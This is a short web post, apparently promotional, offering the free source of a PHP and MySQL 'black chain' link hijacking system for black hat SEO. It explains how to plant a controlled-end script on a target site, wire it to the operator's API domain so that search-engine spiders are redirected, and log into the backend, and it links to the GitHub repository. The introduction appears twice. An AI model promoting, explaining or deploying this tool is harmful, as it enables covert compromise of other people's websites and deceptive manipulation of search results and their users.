Ceacer Black Chain Hijacking System - Free Source Code
This is a black hat link hijacking system developed by Ceacer, built entirely with PHP and MySQL. It's a simple, pre-built system that currently supports detecting spider redirects, rather than using JavaScript to control redirects. Feel free to modify it if needed. Please provide feedback if you encounter any problems! File Explanation: 1. link1.php link1.php contains the code for the controlled end. You need to place this code on the target site and configure the API. Specifically, `$api_url = 'http://yousite.com/api/';` // Replace `yousite.com` with your domain name.
This is a black hat link hijacking system developed by Ceacer. It's purely PHP + MySQL, and it's already set up. Currently, it supports judging spider redirects rather than controlling redirects with JavaScript. Feel free to use it if needed, and please let us know if you encounter any problems!
File Explanation: 1. link1.php link1.php is the code for the controlled end. You need to place this code on the target site and configure the API. Specifically, $api_url = ' http://yousite.com/api/ '; // Replace yousite.com with your domain name.
2. config.php: The website configuration file used for database connections; there's not much to say about this.
3. The website's API file, \api\index.php, is used for remote calls and redirects from link.php and does not require modification.
4. The \sql
folder contains the database SQL file. You need to import the database. The default username and password are: admin (password is not provided).
Backend login: https://yousite.com/login.php
screenshot
It has been published on GitHub.
Direct link: https://github.com/kevinceacer/ceacer_blacklink
